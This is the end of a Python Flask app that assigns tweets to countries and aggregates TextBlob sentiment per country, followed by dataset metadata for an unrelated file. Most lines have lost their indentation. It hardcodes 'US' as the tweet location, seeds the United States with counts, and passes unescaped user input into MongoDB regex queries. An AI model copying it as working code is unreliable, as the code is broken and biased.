if tweet.coordinates:
user_data["result"]["primary_geo"] = 'US' # str(tweet.coordinates[tweet.coordinates.keys()[1]][1]) + ", " + str(tweet.coordinates[tweet.coordinates.keys()[1]][0])
user_data["result"]["geo_type"] = "Tweet coordinates"
elif tweet.place:
user_data["result"]["primary_geo"] = tweet.place.full_name + ", " + tweet.place.country
user_data["result"]["geo_type"] = "Tweet place"
else:
user_data["result"]["primary_geo"] = tweet.user.location
user_data["result"]["geo_type"] = "User location"
if user_data["result"]["primary_geo"]:
user_data["result"]["analysis_result"] = sentiment_analysis
user_data["result"]["country"] = get_country(user_data["result"]["primary_geo"])
print(user_data["result"]["country"])
if user_data["result"]["country"] is not None:
if user_data["result"]["country"] in countries:
countries[user_data["result"]["country"]]["total_tweets"] = countries[user_data["result"]["country"]]["total_tweets"] + 1
if sentiment_analysis.sentiment.polarity > 0:
countries[user_data["result"]["country"]]["positive"] = countries[user_data["result"]["country"]]["positive"] + 1
elif sentiment_analysis.sentiment.polarity < 0:
countries[user_data["result"]["country"]]["negative"] = countries[user_data["result"]["country"]]["negative"] + 1
else:
countries[user_data["result"]["country"]]["neutral"] = countries[user_data["result"]["country"]]["neutral"] + 1
total_polarity = countries[user_data["result"]["country"]]["total_polarity"]
total_polarity = total_polarity + sentiment_analysis.sentiment.polarity
mean = total_polarity / countries[user_data["result"]["country"]]["total_tweets"]
countries[user_data["result"]["country"]]["total_polarity"] = total_polarity
countries[user_data["result"]["country"]]["total"] = mean * 100
users_with_geodata['data'].append(user_data)
geo_tweets += 1
elif user_id in all_users:
for user in users_with_geodata["data"]:
if user_id == user["user_id"]:
user["result"]["tweets"] += 1
for user in users_with_geodata["data"]:
geo_tweets = geo_tweets + user["result"]["tweets"]
print("The file included " + str(len(all_users)) + " unique users who tweeted with or without geo data")
print("The file included " + str(len(users_with_geodata['data'])) + " unique users who tweeted with geo data, including 'location'")
print("The users with geo data tweeted " + str(geo_tweets) + " out of the total " + str(total_tweets) + " of tweets.")
return jsonify(countries), {'Access-Control-Allow-Origin': '*'}
def get_tweet_sentiment(tweet):
    # create TextBlob object of the cleaned tweet text and return the full analysis;
    # callers classify the sentiment themselves from analysis.sentiment.polarity
    analysis = TextBlob(clean_tweet(tweet))
    return analysis
def clean_tweet(tweet):
return ' '.join(re.sub("(@[A-Za-z0-9]+)|([^0-9A-Za-z \t])|(\w+:\/\/\S+)", " ", tweet).split())
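# e.g. clean_tweet("@user check https://t.co/x #great!") returns "check great":
# mentions, URLs and punctuation are replaced by spaces before the words are re-joined.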
def get_country(location):
countries_collection = db.countries
splitted_data = location.split(',')
country = ''
if len(splitted_data) > 0:
city = splitted_data[0]
splitted_cities = city.split(' ')
for city in splitted_cities:
for x in countries_collection.find({ "name" : {"$regex": city, '$options': 'i'} } ):
country = x["country"]
break
if country == "":
for city in splitted_cities:
for x in countries_collection.find({ "subcountry" : {"$regex": city, '$options': 'i'} } ):
country = x["country"]
break
else:
for x in countries_collection.find({ "name" : {"$regex": location, '$options': 'i'} } ):
country = x["country"]
return country
def get_countries_list():
countries = {
"Afghanistan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Albania": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Algeria": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Angola": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Anguilla": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Antigua and Barbuda": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Argentina": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Armenia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Aruba": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Australia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Austria": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Azerbaijan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bahamas, The": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bahrain": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bangladesh": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Barbados": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Belarus": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Belgium": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Belize": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Benin": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bermuda": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bhutan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bolivia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bosnia and Herz.": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Botswana": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Brazil": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"British Virgin Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Brunei": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bulgaria": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Burkina Faso": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Burundi": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Cambodia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Cameroon": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Canada": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Cape Verde": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Cayman Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Central African Rep.": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Chad": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Chile": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"China": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Colombia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Comoros": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Dem. Rep. Congo": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Congo": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Cook Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Costa Rica": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Ivory Coast": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Croatia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Cuba": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Curacao": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Cyprus": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Czech Rep.": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Denmark": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Djibouti": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Dominica": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Dominican Rep.": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Ecuador": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Egypt": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"El Salvador": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Equatorial Guinea": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Eritrea": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Estonia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Ethiopia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"European Union": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Falkland Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Faroe Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Fiji": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Finland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"France": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"French Polynesia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Gabon": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Gambia, The": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Georgia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Germany": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Ghana": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Gibraltar": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Greece": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Greenland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Grenada": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Guatemala": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Guernsey": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Guinea": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Guinea-Bissau": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Guyana": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Haiti": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Honduras": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Hong Kong": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Hungary": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Iceland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"India": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Indonesia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Iran": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Iraq": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Ireland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Isle of Man": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Israel": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Italy": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Jamaica": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Japan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Jersey": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Jordan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Kazakhstan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Kenya": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Kiribati": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Dem. Rep. Korea": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Korea": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Kosovo": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Kuwait": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Kyrgyzstan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Lao PDR": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Latvia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Lebanon": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Lesotho": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Liberia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Libya": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Liechtenstein": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Lithuania": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Luxembourg": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Macau": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Macedonia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Madagascar": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Malawi": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Malaysia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Maldives": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Mali": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Malta": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Marshall Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Mauritania": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Mauritius": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Mexico": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Micronesia, Federated States of": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Moldova": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Monaco": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Mongolia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Montenegro": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Montserrat": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Morocco": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Mozambique": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Myanmar": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Namibia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Nepal": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Netherlands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"New Caledonia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"New Zealand": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Nicaragua": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Niger": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Nigeria": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Niue": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Norway": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Oman": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Pakistan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Palau": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Panama": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Papua New Guinea": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Paraguay": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Peru": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Philippines": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Poland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Portugal": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Puerto Rico": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Qatar": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Romania": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Russia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Rwanda": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Saint Kitts and Nevis": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Saint Lucia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Saint Martin": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Saint Vincent and the Grenadines": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Samoa": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"San Marino": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Sao Tome and Principe": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Saudi Arabia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Senegal": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Serbia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Seychelles": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Sierra Leone": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Singapore": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Sint Maarten": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Slovakia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Slovenia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Solomon Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Somalia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Somaliland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"South Africa": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Spain": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Sri Lanka": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Sudan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"S. Sudan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Suriname": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Swaziland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Sweden": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Switzerland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Syria": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Taiwan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Tajikistan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Tanzania": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Thailand": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Timor-Leste": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Togo": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Tonga": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Trinidad and Tobago": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Tunisia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Turkey": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Turkmenistan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Turks and Caicos Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Tuvalu": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Uganda": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Ukraine": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"United Arab Emirates": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"United Kingdom": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"United States": {
"positive": 10, "neutral": 10, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Uruguay": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Uzbekistan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Vanuatu": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Venezuela": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Vietnam": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"U.S. Virgin Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"West Bank and Gaza": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Western Sahara": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Yemen": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Zambia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Zimbabwe": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
}
}
return countries
@app.route('/trends')
def get_trends():
trends = api.trends_place(id = 1)
return jsonify({'trends' : trends}), {'Access-Control-Allow-Origin': '*'}
if __name__ == '__main__':
app.run()
|
[
"zainmustafa@Zains-MacBook-Pro.local"
] |
zainmustafa@Zains-MacBook-Pro.local
|
634a7e6ba53de55dedd32d88b1d65db04278345f
|
da18a193b24638bb11429d5038b5b5028b46373f
|
/service/service.py
|
2d5b0bd3a2032fc75cd51624155f44b073a1e6da
|
[] |
no_license
|
ankurmishra1394/Image-Management-API
|
2b4587173c029fce0dc9e05d91f4b662934e3c2e
|
df8a166e4397aa6226a9a97cb2fed74303dd07f8
|
refs/heads/master
